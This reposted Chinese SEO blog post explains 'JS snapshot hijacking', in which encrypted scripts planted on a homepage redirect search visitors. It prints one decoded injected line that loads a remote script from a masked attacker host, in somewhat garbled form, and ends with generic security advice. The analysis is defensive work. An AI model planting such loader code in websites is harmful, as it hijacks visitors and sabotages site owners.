站长经常会遇到js快照劫持的问题,对网站的优化影响很大。对于大多数新手站长来说,js快照劫持是无可奈何的。今天无忧老师就给大家深度分析一下。
网站安全被黑
首先,js快照劫持的例子
Js劫持了演示图,记录了是网站跳转。
一个是百度搜索快照劫持演示。另一个是搜狐搜索快照劫持演示。
JS快照劫持,百度搜索演示
JS快照劫持,百度搜索演示
JS快照劫持,搜狐搜索演示图
二、分析js快照劫持代码
经分析,该网站首页被植入恶意代码,JS代码被多次加密。
加密的JS代码
这个代码是JS添加到网站首页的,属于加密代码。总的来说没什么猫腻。
三、加密JS逐层分析
接下来进行JS逆向分析。可以用站长工具在线分析:http://tool.chinaz.com/js.aspx
站长JS混淆加密压缩截图
解析完就能看到真面目了,这个代码。
& ltscript type = " text/JavaScript " >
document . writeln(" <脚本src = ***.hidden.com/***in2.js >;& lt/script >);& lt/script >
打开这个***in2.js可以看到一段代码。
JS恶意代码的二次加密
攻击者真的很有能量,一层一层的加密。难怪一般站长根本找不到。
然后解密。
加密JS恶意代码分析图
大家应该都清楚,攻击者将代码加密三次,然后调用,实现百度快照的JS劫持跳转。
第四,网站安全建议
网站安全一直是站长运营者头疼的问题。没有100%安全的网站,只有一次性的维护和优化,做到定时备份,定时检查,最大程度的消除网站被黑、被劫持的风险。希望各位站长知道并牢记在心。
和数据安全
如果你想要的话?我给大家分析一下整个JS快照劫持代码。
最后,在我的课程中,我经常分享一些关于网站安全的知识。请关注我的SEO博客,不断分析干货教程和文章。
文章由SEO技术博客无忧老师分享。请注明出处。https://***.ainiseo.com,谢谢你的阅读。
本文来自转身以后投稿,不代表舒华文档立场,如若转载,请注明出处:https://www.chinashuhua.cn/24/584895.html